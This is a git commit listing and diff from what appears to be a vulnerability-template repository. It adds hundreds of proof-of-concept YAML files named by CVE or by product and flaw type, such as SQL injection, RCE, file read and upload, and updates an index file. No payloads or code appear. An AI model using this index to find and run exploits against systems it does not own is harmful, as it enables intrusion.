poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml create mode 100644 poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml create mode 100644 poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml create mode 100644 poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml create mode 100644 poc/cve/CVE-2024-12465.yaml create mode 100644 poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml create mode 100644 poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml create mode 100644 poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml create mode 100644 poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml create mode 100644 poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml create mode 100644 poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml create mode 100644 poc/cve/CVE-2024-12572.yaml create mode 100644 poc/cve/CVE-2024-12574.yaml create mode 100644 poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml create mode 100644 poc/cve/CVE-2024-12579.yaml create mode 100644 poc/cve/CVE-2024-12581.yaml create mode 100644 
poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml create mode 100644 poc/cve/CVE-2024-37250.yaml create mode 100644 poc/cve/CVE-2024-43222.yaml create mode 100644 poc/cve/CVE-2024-43300.yaml create mode 100644 poc/cve/CVE-2024-43968.yaml create mode 100644 poc/cve/CVE-2024-47321.yaml create mode 100644 poc/cve/CVE-2024-49323.yaml create mode 100644 poc/cve/CVE-2024-49334.yaml create mode 100644 poc/cve/CVE-2024-5029.yaml create mode 100644 poc/cve/CVE-2024-50423.yaml create mode 100644 poc/cve/CVE-2024-50504.yaml create mode 100644 poc/cve/CVE-2024-50506.yaml create mode 100644 poc/cve/CVE-2024-50507.yaml create mode 100644 poc/cve/CVE-2024-50508.yaml create mode 100644 poc/cve/CVE-2024-50509.yaml create mode 100644 poc/cve/CVE-2024-50510.yaml create mode 100644 poc/cve/CVE-2024-50511.yaml create mode 100644 poc/cve/CVE-2024-50512.yaml create mode 100644 poc/cve/CVE-2024-50513.yaml create mode 100644 poc/cve/CVE-2024-50514.yaml create mode 100644 poc/cve/CVE-2024-50515.yaml create mode 100644 poc/cve/CVE-2024-50516.yaml create mode 100644 poc/cve/CVE-2024-50550.yaml create mode 100644 poc/cve/CVE-2024-51615.yaml create mode 100644 poc/cve/CVE-2024-51647.yaml create mode 100644 poc/cve/CVE-2024-51792.yaml create mode 100644 poc/cve/CVE-2024-51815.yaml create mode 100644 poc/cve/CVE-2024-53278.yaml create mode 100644 poc/cve/CVE-2024-53725.yaml create mode 100644 poc/cve/CVE-2024-53729.yaml create mode 100644 poc/cve/CVE-2024-53737.yaml create mode 100644 poc/cve/CVE-2024-53738.yaml create mode 100644 poc/cve/CVE-2024-53739.yaml create mode 100644 poc/cve/CVE-2024-53803.yaml create mode 100644 poc/cve/CVE-2024-53804.yaml create mode 100644 poc/cve/CVE-2024-53805.yaml create mode 100644 poc/cve/CVE-2024-53807.yaml create mode 100644 poc/cve/CVE-2024-53808.yaml create mode 100644 poc/cve/CVE-2024-53812.yaml create mode 100644 poc/cve/CVE-2024-53815.yaml create mode 100644 poc/cve/CVE-2024-53817.yaml create mode 100644 poc/cve/CVE-2024-53818.yaml create mode 
100644 poc/cve/CVE-2024-53819.yaml create mode 100644 poc/cve/CVE-2024-53823.yaml create mode 100644 poc/cve/CVE-2024-53824.yaml create mode 100644 poc/cve/CVE-2024-53826.yaml create mode 100644 poc/cve/CVE-2024-54206.yaml create mode 100644 poc/cve/CVE-2024-54207.yaml create mode 100644 poc/cve/CVE-2024-54212.yaml create mode 100644 poc/cve/CVE-2024-54213.yaml create mode 100644 poc/cve/CVE-2024-54214.yaml create mode 100644 poc/cve/CVE-2024-54215.yaml create mode 100644 poc/cve/CVE-2024-54216.yaml create mode 100644 poc/cve/CVE-2024-54217.yaml create mode 100644 poc/cve/CVE-2024-54218.yaml create mode 100644 poc/cve/CVE-2024-54219.yaml create mode 100644 poc/cve/CVE-2024-54220.yaml create mode 100644 poc/cve/CVE-2024-54221.yaml create mode 100644 poc/cve/CVE-2024-54223.yaml create mode 100644 poc/cve/CVE-2024-54224.yaml create mode 100644 poc/cve/CVE-2024-54225.yaml create mode 100644 poc/cve/CVE-2024-54226.yaml create mode 100644 poc/cve/CVE-2024-54227.yaml create mode 100644 poc/cve/CVE-2024-54228.yaml create mode 100644 poc/cve/CVE-2024-54230.yaml create mode 100644 poc/cve/CVE-2024-54231.yaml create mode 100644 poc/cve/CVE-2024-54232.yaml create mode 100644 poc/cve/CVE-2024-54247.yaml create mode 100644 poc/cve/CVE-2024-54250.yaml create mode 100644 poc/cve/CVE-2024-54251.yaml create mode 100644 poc/cve/CVE-2024-54253.yaml create mode 100644 poc/cve/CVE-2024-54255.yaml create mode 100644 poc/cve/CVE-2024-54260.yaml create mode 100644 poc/cve/CVE-2024-7982.yaml create mode 100644 poc/cve/CVE-2024-8157.yaml create mode 100644 poc/cve/CVE-2024-8378.yaml create mode 100644 poc/cve/CVE-2024-8444.yaml create mode 100644 poc/cve/CVE-2024-8625.yaml create mode 100644 poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml create mode 100644 poc/cve/CVE-2024-9290.yaml create mode 100644 poc/cve/CVE-2024-9422.yaml create mode 100644 poc/cve/CVE-2024-9428.yaml create mode 100644 poc/cve/CVE-2024-9608.yaml create mode 100644 poc/cve/CVE-2024-9651.yaml create mode 
100644 poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml create mode 100644 poc/cve/CVE-2024-9768.yaml create mode 100644 poc/cve/CVE-2024-9828.yaml create mode 100644 poc/cve/CVE-2024-9835.yaml create mode 100644 poc/cve/CVE-2024-9836.yaml create mode 100644 poc/cve/CVE-2024-9934.yaml create mode 100644 poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml create mode 100644 poc/detect/adbuddy-adblocker-detection.yaml create mode 100644 poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml create mode 100644 poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml create mode 100644 poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml create mode 100644 poc/other/abcbiz-addons.yaml create mode 100644 poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml create mode 100644 poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml create mode 100644 poc/other/aio-contact.yaml create mode 100644 poc/other/all-in-one-slider.yaml create mode 100644 poc/other/alphabetical-list.yaml create mode 100644 poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml create mode 100644 poc/other/blizzard-quotes.yaml create mode 100644 poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml create mode 100644 poc/other/booking-system-trafft.yaml create mode 100644 poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml create mode 100644 poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml create mode 100644 poc/other/bulk-role-change.yaml create mode 100644 poc/other/cb-logo-slider.yaml create mode 100644 poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml create mode 100644 poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml create mode 100644 poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml create mode 100644 poc/other/designer.yaml create mode 100644 poc/other/dsdownloadlist.yaml create mode 100644 
poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml create mode 100644 poc/other/fat-services-booking.yaml create mode 100644 poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml create mode 100644 poc/other/full-screen-page-background-image-slideshow.yaml create mode 100644 poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml create mode 100644 poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml create mode 100644 poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml create mode 100644 poc/other/gmw-premium-settings.yaml create mode 100644 poc/other/hello-in-all-languages.yaml create mode 100644 poc/other/hits-counter.yaml create mode 100644 poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml create mode 100644 poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml create mode 100644 poc/other/jiusi-oa-dl-fileread.yaml create mode 100644 poc/other/jquery-manager.yaml create mode 100644 poc/other/kingdee_eas_pdfViewLocal_fileread.yaml create mode 100644 poc/other/kingview-KingPortal-img-fileread.yaml create mode 100644 poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml create mode 100644 poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml create mode 100644 poc/other/logs-de-connexion.yaml create mode 100644 poc/other/newsmanapp.yaml create mode 100644 poc/other/newspack-plugin.yaml create mode 100644 poc/other/notibar.yaml create mode 100644 poc/other/ootb-openstreetmap.yaml create mode 100644 poc/other/planning-center-online-giving.yaml create mode 100644 poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml create mode 100644 poc/other/post-to-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml create mode 100644 poc/other/post-types-carousel-slider-c7b7350193feff134087fae14530c8a3.yaml create mode 100644 poc/other/posts-and-products-views-6353d59c8166d0c7835a56c9603f6772.yaml create mode 100644 poc/other/primer-mydata.yaml create mode 100644 
poc/other/products-stock-manager-with-excel.yaml create mode 100644 poc/other/property-hive-stamp-duty-calculator.yaml create mode 100644 poc/other/revy.yaml create mode 100644 poc/other/rrdevs-for-elementor.yaml create mode 100644 poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml create mode 100644 poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml create mode 100644 poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml create mode 100644 poc/other/svg-shortcode.yaml create mode 100644 poc/other/sweetdate.yaml create mode 100644 poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml create mode 100644 poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml create mode 100644 poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml create mode 100644 poc/other/themify-store-locator.yaml create mode 100644 poc/other/tianrongxin-TopSAG-download-download.yaml create mode 100644 poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml create mode 100644 poc/other/unlock-addons-for-elementor.yaml create mode 100644 poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml create mode 100644 poc/other/wangyuxingyun_vpn_client_filedownload.yaml create mode 100644 poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml create mode 100644 poc/other/woo-product-excel-importer.yaml create mode 100644 poc/other/wot-elementor-widgets.yaml create mode 100644 poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml create mode 100644 poc/other/yonyou-UFIDA-NC-download-fileread.yaml create mode 100644 poc/remote_code_execution/D-Link_DNS-320-account_mgr-rce.yaml create mode 100644 poc/remote_code_execution/D-Link_DNS-320-scan_dsk-rce.yaml create mode 100644 poc/remote_code_execution/ar-for-woocommerce.yaml create mode 100644 poc/remote_code_execution/cyberpanel-upgrademysqlstatus-rce.yaml create mode 100644 
poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml create mode 100644 poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml create mode 100644 poc/remote_code_execution/kingdee_eas_apputil_rce.yaml create mode 100644 poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml create mode 100644 poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml create mode 100644 poc/remote_code_execution/ni-woocommerce-order-export.yaml create mode 100644 poc/remote_code_execution/prodigy-commerce.yaml create mode 100644 poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml create mode 100644 poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml create mode 100644 poc/remote_code_execution/woocommerce-myparcel.yaml create mode 100644 poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml create mode 100644 poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml create mode 100644 poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml create mode 100644 poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml create mode 100644 poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml create mode 100644 poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml create mode 100644 poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml create mode 100644 poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml create mode 100644 poc/sql/adbuddy-adblocker-detection.yaml create mode 100644 poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml create mode 100644 poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml create mode 100644 poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml create mode 100644 poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml create mode 100644 poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml create mode 100644 poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml create mode 
100644 poc/sql/movie-database.yaml create mode 100644 poc/sql/qiwang-ERP-drawGrid-sqli.yaml create mode 100644 poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml create mode 100644 poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml create mode 100644 poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml create mode 100644 poc/sql/yongyou-nc-process-sqli.yaml create mode 100644 poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml create mode 100644 poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml create mode 100644 poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml create mode 100644 poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml create mode 100644 poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml create mode 100644 poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml create mode 100644 poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml create mode 100644 poc/sql_injection/yongyou-nc-process-sqli.yaml create mode 100644 poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml create mode 100644 poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml create mode 100644 poc/upload/EKing-Base64Upload-fileupload.yaml create mode 100644 poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml create mode 100644 poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml create mode 100644 poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml create mode 100644 poc/upload/inspur-GS-UploadListFile-uploadfile.yaml create mode 100644 poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml create mode 100644 poc/upload/meite-crm-upload-upload.yaml create mode 100644 poc/upload/nuuo-upload-uploadfile.yaml create mode 100644 poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml create mode 100644 poc/upload/yongyou-u8c-esnserver-fileupload.yaml create mode 100644 poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml create mode 100644 poc/web/lanling-oa-hrstaffwebservice-fileread.yaml create mode 100644 
poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml create mode 100644 poc/wordpress/indeed-wp-superbackup.yaml create mode 100644 poc/wordpress/jlayer-parallax-slider-wp.yaml create mode 100644 poc/wordpress/jwp-a11y.yaml create mode 100644 poc/wordpress/real-wp-shop-lite.yaml create mode 100644 poc/wordpress/users-import-export-with-excel-for-wp.yaml create mode 100644 poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml create mode 100644 poc/wordpress/wp-auctions.yaml create mode 100644 poc/wordpress/wp-donimedia-carousel.yaml create mode 100644 poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml create mode 100644 poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml create mode 100644 poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml create mode 100644 poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml create mode 100644 poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml create mode 100644 poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml create mode 100644 poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml create mode 100644 poc/wordpress/wp-tithely.yaml create mode 100644 poc/wordpress/wpcasa.yaml
diff --git a/date.txt b/date.txt
index dba749d567..ae0d5cf829 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241213
+20241214
diff --git a/poc.txt b/poc.txt
index 685556a160..0b9baa0ed8 100644
--- a/poc.txt
+++ b/poc.txt
@@ -3136,6 +3136,7 @@
 ./poc/auth/fake-referer-header-auth-bypass.yaml
 ./poc/auth/fancier-author-box-7cc7e63c608b1490036ac810d817183e.yaml
 ./poc/auth/fancier-author-box.yaml
+./poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml
 ./poc/auth/fanwei-byPass-login.yaml
 ./poc/auth/fanwei-eweaver-pluginviewservlet-unauth.yaml
 ./poc/auth/fanwei-login-bypass.yaml
@@ -3468,6 +3469,7 @@ ./poc/auth/hadoop-unauthenticated-access.yaml ./poc/auth/hadoop-yarn-unauth.yaml ./poc/auth/hadoop-yarn-unauth.yml +./poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml ./poc/auth/hand-srm-auth-bypass.yaml ./poc/auth/haofeng-firewall-setdomain-unauth.yaml ./poc/auth/hardcoded-api-keys.yaml @@ -3623,6 +3625,7 @@ ./poc/auth/idemia-biometrics-default-login-8141.yaml ./poc/auth/idemia-biometrics-default-login.yaml ./poc/auth/identification-auth-failures.yaml +./poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml ./poc/auth/ikuai-login-panel.yaml ./poc/auth/imgproxy-unauth.yaml ./poc/auth/imm-default-login.yaml @@ -4187,6 +4190,7 @@ ./poc/auth/microsoft-exchange-login.yaml ./poc/auth/mikrotik-routeros-login-page.yaml ./poc/auth/milesightvpn-etc-passwd-fileread.yaml +./poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml ./poc/auth/minimum-password-age-zero.yaml ./poc/auth/minio-default-login(1).yaml ./poc/auth/minio-default-login-1.yaml @@ -5308,6 +5312,7 @@ ./poc/auth/solarwinds-default-login-10356.yaml ./poc/auth/solarwinds-default-login-2.yaml ./poc/auth/solarwinds-default-login.yaml +./poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml ./poc/auth/somfy-login-10371.yaml ./poc/auth/somfy-login-10372.yaml ./poc/auth/somfy-login-10373.yaml @@ -6144,6 +6149,7 @@ ./poc/auth/yith-woocommerce-social-login-a472e8d344476ac1fe5c7a6c4cbb802f.yaml ./poc/auth/yith-woocommerce-social-login-f5c3285c546d26859e884d10b1091900.yaml ./poc/auth/yith-woocommerce-social-login.yaml +./poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml ./poc/auth/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml ./poc/auth/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/auth/yongyou-u8-RegisterServlet-sql-Injection.yaml 
@@ -7059,6 +7065,7 @@ ./poc/backup/flickr-picture-backup.yaml ./poc/backup/froxlor-database-backup.yaml ./poc/backup/indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1.yaml +./poc/backup/indeed-wp-superbackup.yaml ./poc/backup/keep-backup-daily-327b6a6a640edb13bfc96ce69665c4fa.yaml ./poc/backup/keep-backup-daily-4c652bcfb4201d0cbb1802dd87b49532.yaml ./poc/backup/keep-backup-daily-787820acd6b94f794c54239b32b10a99.yaml @@ -7637,6 +7644,7 @@ ./poc/cnvd/ecshop-cnvd-2020-58823-sqli.yml ./poc/cnvd/eea-info-leak-cnvd-2021-10543.yaml ./poc/cnvd/eea-info-leak-cnvd-2021-10543.yml +./poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml ./poc/cnvd/h5s-video-platform-cnvd-2020-67113-unauth.yaml ./poc/cnvd/h5s-video-platform-cnvd-2020-67113-unauth.yml ./poc/cnvd/joomla-cnvd-2019-34135-rce.yaml @@ -8117,6 +8125,7 @@ ./poc/config/magento-config.yaml ./poc/config/manageengine-network-config.yaml ./poc/config/micollab_audio,_web_&_video_conferencing.yaml +./poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml ./poc/config/misconfig.yaml ./poc/config/misconfigured-concrete5.yaml ./poc/config/misconfigured-docker-8900.yaml @@ -9209,6 +9218,7 @@ ./poc/cve/CVE-2011-5106-2096.yaml ./poc/cve/CVE-2011-5106.yaml ./poc/cve/CVE-2011-5107-2098.yaml +./poc/cve/CVE-2011-5107-2102.yaml ./poc/cve/CVE-2011-5107-2104.yaml ./poc/cve/CVE-2011-5107-4c5dcdac42f06a71adb7271143d88793.yaml ./poc/cve/CVE-2011-5107.yaml @@ -10260,6 +10270,7 @@ ./poc/cve/CVE-2014-4536-2350.yaml ./poc/cve/CVE-2014-4536-2351.yaml ./poc/cve/CVE-2014-4536-2353.yaml +./poc/cve/CVE-2014-4536-2354.yaml ./poc/cve/CVE-2014-4536-c40ca00b1126e4382a5ed06f07d970fe.yaml ./poc/cve/CVE-2014-4536.yaml ./poc/cve/CVE-2014-4537-f13b343f9c9b9dece35e3b7d0c291a51.yaml 
@@ -10712,6 +10723,7 @@ ./poc/cve/CVE-2014-9094-2417.yaml ./poc/cve/CVE-2014-9094-2420.yaml ./poc/cve/CVE-2014-9094-2421.yaml +./poc/cve/CVE-2014-9094-2422.yaml ./poc/cve/CVE-2014-9094-33981699600bd7688fa76839ea64eb69.yaml ./poc/cve/CVE-2014-9094.yaml ./poc/cve/CVE-2014-9097-185f364a811c7ac717748c28afbba129.yaml @@ -11108,6 +11120,7 @@ ./poc/cve/CVE-2015-2794 (copy 1).yaml ./poc/cve/CVE-2015-2794.yaml ./poc/cve/CVE-2015-2807-2497.yaml +./poc/cve/CVE-2015-2807-2500.yaml ./poc/cve/CVE-2015-2807-900a53ae0846b5347a5a43a6953175d4.yaml ./poc/cve/CVE-2015-2807.yaml ./poc/cve/CVE-2015-2824-abe81889bc2f1d741112f2dc9ccacef0.yaml @@ -12751,6 +12764,7 @@ ./poc/cve/CVE-2017-16955.yaml ./poc/cve/CVE-2017-17043-08130ba3bd49cd34b98615982fe7f7a9.yaml ./poc/cve/CVE-2017-17043-2975.yaml +./poc/cve/CVE-2017-17043-2977.yaml ./poc/cve/CVE-2017-17043.yaml ./poc/cve/CVE-2017-17058.yaml ./poc/cve/CVE-2017-17059-2978.yaml @@ -15256,6 +15270,7 @@ ./poc/cve/CVE-2019-25218-a65f297de2dde5d301565d73e653f356.yaml ./poc/cve/CVE-2019-25218.yaml ./poc/cve/CVE-2019-25221-86298068dfd5127aa948cb7fa748c15a.yaml +./poc/cve/CVE-2019-25221.yaml ./poc/cve/CVE-2019-2578-1.yaml ./poc/cve/CVE-2019-2578-2.yaml ./poc/cve/CVE-2019-2578.yaml @@ -15571,6 +15586,7 @@ ./poc/cve/CVE-2020-10966.yaml ./poc/cve/CVE-2020-10973.yaml ./poc/cve/CVE-2020-11023-3beb604b5149be28498143011514aa9e.yaml +./poc/cve/CVE-2020-11023.yaml ./poc/cve/CVE-2020-11025-2967734c4ace9cc5abf86caf7a7b7f4d.yaml ./poc/cve/CVE-2020-11025.yaml ./poc/cve/CVE-2020-11026-27df0ea7c6590b827fd75993432bfee2.yaml @@ -16222,6 +16238,7 @@ ./poc/cve/CVE-2020-24148.yaml ./poc/cve/CVE-2020-24149-f17b476af9729c706149033214bc1201.yaml ./poc/cve/CVE-2020-24149.yaml +./poc/cve/CVE-2020-24186-4793.yaml ./poc/cve/CVE-2020-24186-4794.yaml ./poc/cve/CVE-2020-24186-4797.yaml ./poc/cve/CVE-2020-24186-4798.yaml 
@@ -16551,6 +16568,7 @@ ./poc/cve/CVE-2020-35200.yaml ./poc/cve/CVE-2020-35234-4ad486f8d142a386c5ede03d65e1f4af.yaml ./poc/cve/CVE-2020-35234-5025.yaml +./poc/cve/CVE-2020-35234-5026.yaml ./poc/cve/CVE-2020-35234.yaml ./poc/cve/CVE-2020-35235-e24fd8e9d3e4c5cd7358a2f299593578.yaml ./poc/cve/CVE-2020-35235.yaml @@ -19536,6 +19554,7 @@ ./poc/cve/CVE-2021-25109.yaml ./poc/cve/CVE-2021-25110-a5ef4cd3e6eaf436924d83f61b36f76a.yaml ./poc/cve/CVE-2021-25110.yaml +./poc/cve/CVE-2021-25111-5802.yaml ./poc/cve/CVE-2021-25111-5803.yaml ./poc/cve/CVE-2021-25111-e640acbee9a077ca1d863383eb2c8ddd.yaml ./poc/cve/CVE-2021-25111.yaml @@ -22023,9 +22042,11 @@ ./poc/cve/CVE-2022-1594.yaml ./poc/cve/CVE-2022-1595-0e73bbe25b7940a09c9eef8f51053411.yaml ./poc/cve/CVE-2022-1595.yaml +./poc/cve/CVE-2022-1597-6652.yaml ./poc/cve/CVE-2022-1597-ce492abfcf1c06730d5d8f86090810b4.yaml ./poc/cve/CVE-2022-1597.yaml ./poc/cve/CVE-2022-1598-6653.yaml +./poc/cve/CVE-2022-1598-6654.yaml ./poc/cve/CVE-2022-1598-a0e50bca828ab26f40098be59c4594f6.yaml ./poc/cve/CVE-2022-1598.yaml ./poc/cve/CVE-2022-1599-35094c7c694f8c5f158da4361ba07f3c.yaml @@ -28334,6 +28355,7 @@ ./poc/cve/CVE-2023-24406-415771c263c92bfdf7d8fad679773904.yaml ./poc/cve/CVE-2023-24406.yaml ./poc/cve/CVE-2023-24407-725d247a52bd9564ba0263d24a049d49.yaml +./poc/cve/CVE-2023-24407.yaml ./poc/cve/CVE-2023-24408-f203349881127b9daadd2182e52b859a.yaml ./poc/cve/CVE-2023-24408.yaml ./poc/cve/CVE-2023-24409-5841f0be8a729bd6e8be7d17fda60072.yaml @@ -33887,6 +33909,7 @@ ./poc/cve/CVE-2023-49195-58dcc7c6367c8732f7f3919179f0dcd4.yaml ./poc/cve/CVE-2023-49195.yaml ./poc/cve/CVE-2023-49196-1f41ce4580ff2a6b6234baa60b4e1aca.yaml +./poc/cve/CVE-2023-49196.yaml ./poc/cve/CVE-2023-49197-f5a31bffb7daba1605db44e8eb088947.yaml ./poc/cve/CVE-2023-49197.yaml ./poc/cve/CVE-2023-4920-6255af82ed09be88e8e3a76fcd2aac11.yaml 
@@ -36694,6 +36717,7 @@ ./poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml ./poc/cve/CVE-2024-10008.yaml ./poc/cve/CVE-2024-10010-951aa2e5ac7c686265be838ce5e0fe9f.yaml +./poc/cve/CVE-2024-10010.yaml ./poc/cve/CVE-2024-10011-eefe8c0c540af6a79376e37c4cbbfad9.yaml ./poc/cve/CVE-2024-10011.yaml ./poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml @@ -36751,6 +36775,7 @@ ./poc/cve/CVE-2024-10103-9cb43f1245b0f9d854f9ad1261997a0c.yaml ./poc/cve/CVE-2024-10103.yaml ./poc/cve/CVE-2024-10104-b84d2405dfa0880c1a70b2a3fad82d45.yaml +./poc/cve/CVE-2024-10104.yaml ./poc/cve/CVE-2024-10108-caa219ca69a3786bb9c03f5b9d9a5323.yaml ./poc/cve/CVE-2024-10108.yaml ./poc/cve/CVE-2024-10111-4d3e28e414d06c889d3789abaec95671.yaml @@ -36769,6 +36794,7 @@ ./poc/cve/CVE-2024-10124-2ea452da1894ecbc4a5b2c3a94009474.yaml ./poc/cve/CVE-2024-10124.yaml ./poc/cve/CVE-2024-10146-7c5ec1542ecba7c343e02aa01e7c0776.yaml +./poc/cve/CVE-2024-10146.yaml ./poc/cve/CVE-2024-10147-002fcce0581627f4a9b1f3dab00143e0.yaml ./poc/cve/CVE-2024-10147.yaml ./poc/cve/CVE-2024-10148-66e8a68a811d5893a9baabebb92f1d1e.yaml @@ -36941,8 +36967,11 @@ ./poc/cve/CVE-2024-10470-03018950e373c0e8746e1508abb3b26d.yaml ./poc/cve/CVE-2024-10470.yaml ./poc/cve/CVE-2024-10471-73a898dfd96211fb8e950b5570e3fb68.yaml +./poc/cve/CVE-2024-10471.yaml ./poc/cve/CVE-2024-10473-4bd3b2366c1ef349a8ea2852cdba87bd.yaml +./poc/cve/CVE-2024-10473.yaml ./poc/cve/CVE-2024-10480-c478c5a474eb7197d1a2e40d153a7824.yaml +./poc/cve/CVE-2024-10480.yaml ./poc/cve/CVE-2024-10482-845ce866c54cd77aff0707f285c1d085.yaml ./poc/cve/CVE-2024-10482.yaml ./poc/cve/CVE-2024-10484-cca8c7f3c8f18f65013d62c1a06a3b0d.yaml 
